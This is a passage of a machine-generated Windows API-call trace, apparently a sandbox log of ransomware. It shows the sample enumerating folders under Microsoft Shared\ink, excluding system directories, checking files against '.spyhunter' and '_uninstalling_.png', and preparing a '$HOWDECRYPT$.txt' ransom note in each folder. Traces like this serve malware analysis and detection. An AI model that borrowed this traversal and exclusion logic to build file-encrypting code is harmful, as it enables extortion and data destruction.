pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\$HOWDECRYPT$.txt") returned 77 [0087.288] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\$HOWDECRYPT$.txt") returned 77 [0087.288] GetProcessHeap () returned 0x2c0000 [0087.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3739f0 [0087.288] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa08) returned 0x3867e8 [0087.288] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.288] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="Windows") returned -1 [0087.288] lstrlenW (lpString="Windows") returned 7 [0087.288] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="$Recycle.bin") returned 1 [0087.288] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.288] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="System Volume Information") returned -1 [0087.288] lstrlenW (lpString="System Volume Information") returned 25 [0087.288] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS") returned 65 [0087.288] lstrcmpW (lpString1="sr-Latn-CS", lpString2=".") returned 1 [0087.288] lstrcmpW (lpString1="sr-Latn-CS", lpString2="..") returned 1 [0087.288] GetProcessHeap () returned 0x2c0000 [0087.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.288] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*") returned 67 [0087.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.289] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.289] lstrlenW (lpString="Windows") returned 7 [0087.289] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.289] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.289] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.289] lstrlenW (lpString="System Volume Information") returned 25 [0087.289] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\.") returned 67 [0087.289] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.289] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.289] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.289] lstrlenW (lpString="Windows") returned 7 [0087.289] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.289] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.289] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.289] lstrlenW (lpString="System Volume Information") returned 25 [0087.289] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\..") returned 68 [0087.289] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.289] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.289] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.289] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.289] lstrlenW (lpString="Windows") returned 7 [0087.289] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.289] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.289] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.289] lstrlenW (lpString="System Volume Information") returned 25 [0087.289] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui") returned 81 [0087.289] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.289] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.289] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.290] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui") returned 81 [0087.290] GetProcessHeap () returned 0x2c0000 [0087.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x329278 [0087.290] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa10) returned 0x3867e8 [0087.290] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.290] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.290] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\$HOWDECRYPT$.txt") returned 82 [0087.290] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\$HOWDECRYPT$.txt") returned 82 [0087.290] GetProcessHeap () returned 0x2c0000 [0087.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x329368 [0087.290] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa18) returned 0x3867e8 [0087.290] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.290] lstrcmpiW (lpString1="sv-SE", lpString2="Windows") returned -1 [0087.290] lstrlenW (lpString="Windows") returned 7 [0087.290] lstrcmpiW (lpString1="sv-SE", lpString2="$Recycle.bin") returned 1 [0087.290] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.290] lstrcmpiW (lpString1="sv-SE", lpString2="System Volume Information") returned -1 [0087.290] lstrlenW (lpString="System Volume Information") returned 25 [0087.290] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE") returned 60 [0087.290] lstrcmpW (lpString1="sv-SE", lpString2=".") returned 1 [0087.290] lstrcmpW (lpString1="sv-SE", lpString2="..") returned 1 [0087.290] GetProcessHeap () returned 0x2c0000 [0087.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.291] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*") returned 62 [0087.291] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.292] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.292] lstrlenW (lpString="Windows") returned 7 [0087.292] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.292] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.292] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.292] lstrlenW (lpString="System Volume Information") returned 25 [0087.292] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\.") returned 62 [0087.292] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.292] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.292] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.292] lstrlenW (lpString="Windows") returned 7 [0087.292] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.292] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.292] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.292] lstrlenW (lpString="System Volume Information") returned 25 [0087.292] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\..") returned 63 [0087.292] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.292] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.292] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.292] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.293] lstrlenW (lpString="Windows") returned 7 [0087.293] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.293] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.293] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.293] lstrlenW (lpString="System Volume Information") returned 25 [0087.293] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui") returned 76 [0087.293] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.293] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.293] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.293] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui") returned 76 [0087.293] GetProcessHeap () returned 0x2c0000 [0087.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x373ad8 [0087.293] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa20) returned 0x3867e8 [0087.293] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.293] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.293] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\$HOWDECRYPT$.txt") returned 77 [0087.293] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\$HOWDECRYPT$.txt") returned 77 [0087.293] GetProcessHeap () returned 0x2c0000 [0087.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373bc0 [0087.293] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa28) returned 0x3867e8 [0087.293] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.293] lstrcmpiW (lpString1="TabIpsps.dll", lpString2="Windows") returned -1 [0087.293] lstrlenW (lpString="Windows") returned 7 [0087.293] lstrcmpiW (lpString1="TabIpsps.dll", lpString2="$Recycle.bin") returned 1 [0087.293] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.293] lstrcmpiW (lpString1="TabIpsps.dll", lpString2="System Volume Information") returned 1 [0087.293] lstrlenW (lpString="System Volume Information") returned 25 [0087.293] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 67 [0087.293] StrStrIW (lpFirst="TabIpsps.dll", lpSrch=".spyhunter") returned 0x0 [0087.293] lstrcmpW (lpString1="TabIpsps.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.293] lstrcmpW (lpString1="TabIpsps.dll", lpString2="_uninstalling_.png") returned 1 [0087.294] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 67 [0087.294] GetProcessHeap () returned 0x2c0000 [0087.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358130 [0087.294] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa30) returned 0x3867e8 [0087.294] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.294] lstrcmpiW (lpString1="tabskb.dll", lpString2="Windows") returned -1 [0087.294] lstrlenW (lpString="Windows") returned 7 [0087.294] lstrcmpiW (lpString1="tabskb.dll", lpString2="$Recycle.bin") returned 1 [0087.294] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.294] lstrcmpiW (lpString1="tabskb.dll", lpString2="System Volume Information") returned 1 [0087.294] lstrlenW (lpString="System Volume Information") returned 25 [0087.294] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 65 [0087.294] StrStrIW (lpFirst="tabskb.dll", lpSrch=".spyhunter") returned 0x0 [0087.294] lstrcmpW (lpString1="tabskb.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.294] lstrcmpW (lpString1="tabskb.dll", lpString2="_uninstalling_.png") returned 1 [0087.294] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 65 [0087.294] GetProcessHeap () returned 0x2c0000 [0087.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358200 [0087.294] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa38) returned 0x3867e8 [0087.294] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.294] lstrcmpiW (lpString1="TabTip.exe", lpString2="Windows") returned -1 [0087.294] lstrlenW (lpString="Windows") returned 7 [0087.294] lstrcmpiW (lpString1="TabTip.exe", lpString2="$Recycle.bin") returned 1 [0087.294] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.294] lstrcmpiW (lpString1="TabTip.exe", lpString2="System Volume Information") returned 1 [0087.294] lstrlenW (lpString="System Volume Information") returned 25 [0087.294] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe") returned 65 [0087.294] StrStrIW (lpFirst="TabTip.exe", lpSrch=".spyhunter") returned 0x0 [0087.294] lstrcmpW (lpString1="TabTip.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.294] lstrcmpW (lpString1="TabTip.exe", lpString2="_uninstalling_.png") returned 1 [0087.294] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe") returned 65 [0087.294] GetProcessHeap () returned 0x2c0000 [0087.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x3582d0 [0087.295] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa40) returned 0x3867e8 [0087.295] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.295] lstrcmpiW (lpString1="th-TH", lpString2="Windows") returned -1 [0087.295] lstrlenW (lpString="Windows") returned 7 [0087.295] lstrcmpiW (lpString1="th-TH", lpString2="$Recycle.bin") returned 1 [0087.295] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.295] lstrcmpiW (lpString1="th-TH", lpString2="System Volume Information") returned 1 [0087.295] lstrlenW (lpString="System Volume Information") returned 25 [0087.295] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH") returned 60 [0087.295] lstrcmpW (lpString1="th-TH", lpString2=".") returned 1 [0087.295] lstrcmpW (lpString1="th-TH", lpString2="..") returned 1 [0087.295] GetProcessHeap () returned 0x2c0000 [0087.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.295] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*") returned 62 [0087.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.295] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.295] lstrlenW (lpString="Windows") returned 7 [0087.295] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.295] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.295] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.295] lstrlenW (lpString="System Volume Information") returned 25 [0087.295] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\.") returned 62 [0087.296] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.296] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.296] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.296] lstrlenW (lpString="Windows") returned 7 [0087.296] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.296] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.296] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.296] lstrlenW (lpString="System Volume Information") returned 25 [0087.296] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\..") returned 63 [0087.296] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.296] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.296] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.296] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.296] lstrlenW (lpString="Windows") returned 7 [0087.296] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.296] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.296] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.296] lstrlenW (lpString="System Volume Information") returned 25 [0087.296] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 76 [0087.296] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.296] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.296] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.296] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 76 [0087.296] GetProcessHeap () returned 0x2c0000 [0087.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x373ca8 [0087.296] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa48) returned 0x3867e8 [0087.296] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.296] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.297] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\$HOWDECRYPT$.txt") returned 77 [0087.297] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\$HOWDECRYPT$.txt") returned 77 [0087.297] GetProcessHeap () returned 0x2c0000 [0087.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373d90 [0087.297] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa50) returned 0x3867e8 [0087.297] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.297] lstrcmpiW (lpString1="TipBand.dll", lpString2="Windows") returned -1 [0087.297] lstrlenW (lpString="Windows") returned 7 [0087.297] lstrcmpiW (lpString1="TipBand.dll", lpString2="$Recycle.bin") returned 1 [0087.297] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.297] lstrcmpiW (lpString1="TipBand.dll", lpString2="System Volume Information") returned 1 [0087.297] lstrlenW (lpString="System Volume Information") returned 25 [0087.297] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 66 [0087.297] StrStrIW (lpFirst="TipBand.dll", lpSrch=".spyhunter") returned 0x0 [0087.297] lstrcmpW (lpString1="TipBand.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.297] lstrcmpW (lpString1="TipBand.dll", lpString2="_uninstalling_.png") returned 1 [0087.297] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 66 [0087.297] GetProcessHeap () returned 0x2c0000 [0087.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x358610 [0087.297] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa58) returned 0x3867e8 [0087.297] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.297] lstrcmpiW (lpString1="TipRes.dll", lpString2="Windows") returned -1 [0087.297] lstrlenW (lpString="Windows") returned 7 [0087.297] lstrcmpiW (lpString1="TipRes.dll", lpString2="$Recycle.bin") returned 1 [0087.297] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.297] lstrcmpiW (lpString1="TipRes.dll", lpString2="System Volume Information") returned 1 [0087.297] lstrlenW (lpString="System Volume Information") returned 25 [0087.298] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 65 [0087.298] StrStrIW (lpFirst="TipRes.dll", lpSrch=".spyhunter") returned 0x0 [0087.298] lstrcmpW (lpString1="TipRes.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.298] lstrcmpW (lpString1="TipRes.dll", lpString2="_uninstalling_.png") returned 1 [0087.298] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 65 [0087.298] GetProcessHeap () returned 0x2c0000 [0087.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358d60 [0087.298] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa60) returned 0x3867e8 [0087.298] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.298] lstrcmpiW (lpString1="tipresx.dll", lpString2="Windows") returned -1 [0087.298] lstrlenW (lpString="Windows") returned 7 [0087.298] lstrcmpiW (lpString1="tipresx.dll", lpString2="$Recycle.bin") returned 1 [0087.298] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.298] lstrcmpiW (lpString1="tipresx.dll", lpString2="System Volume Information") returned 1 [0087.298] lstrlenW (lpString="System Volume Information") returned 25 [0087.298] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll") returned 66 [0087.298] StrStrIW (lpFirst="tipresx.dll", lpSrch=".spyhunter") returned 0x0 [0087.298] lstrcmpW (lpString1="tipresx.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.298] lstrcmpW (lpString1="tipresx.dll", lpString2="_uninstalling_.png") returned 1 [0087.298] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll") returned 66 [0087.298] GetProcessHeap () returned 0x2c0000 [0087.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x358c90 [0087.307] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa68) returned 0x3867e8 [0087.307] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.307] lstrcmpiW (lpString1="tipskins.dll", lpString2="Windows") returned -1 [0087.307] lstrlenW (lpString="Windows") returned 7 [0087.307] lstrcmpiW (lpString1="tipskins.dll", lpString2="$Recycle.bin") returned 1 [0087.307] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.307] lstrcmpiW (lpString1="tipskins.dll", lpString2="System Volume Information") returned 1 [0087.307] lstrlenW (lpString="System Volume Information") returned 25 [0087.307] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll") returned 67 [0087.307] StrStrIW (lpFirst="tipskins.dll", lpSrch=".spyhunter") returned 0x0 [0087.307] lstrcmpW (lpString1="tipskins.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.307] lstrcmpW (lpString1="tipskins.dll", lpString2="_uninstalling_.png") returned 1 [0087.307] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll") returned 67 [0087.307] GetProcessHeap () returned 0x2c0000 [0087.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3586e0 [0087.308] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa70) returned 0x3867e8 [0087.308] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.308] lstrcmpiW (lpString1="tiptsf.dll", lpString2="Windows") returned -1 [0087.308] lstrlenW (lpString="Windows") returned 7 [0087.308] lstrcmpiW (lpString1="tiptsf.dll", lpString2="$Recycle.bin") returned 1 [0087.308] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.308] lstrcmpiW (lpString1="tiptsf.dll", lpString2="System Volume Information") returned 1 [0087.308] lstrlenW (lpString="System Volume Information") returned 25 [0087.308] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll") returned 65 [0087.308] StrStrIW (lpFirst="tiptsf.dll", lpSrch=".spyhunter") returned 0x0 [0087.308] lstrcmpW (lpString1="tiptsf.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.308] lstrcmpW (lpString1="tiptsf.dll", lpString2="_uninstalling_.png") returned 1 [0087.308] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll") returned 65 [0087.308] GetProcessHeap () returned 0x2c0000 [0087.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x3587b0 [0087.308] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa78) returned 0x3867e8 [0087.308] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.308] lstrcmpiW (lpString1="tpcps.dll", lpString2="Windows") returned -1 [0087.308] lstrlenW (lpString="Windows") returned 7 [0087.308] lstrcmpiW (lpString1="tpcps.dll", 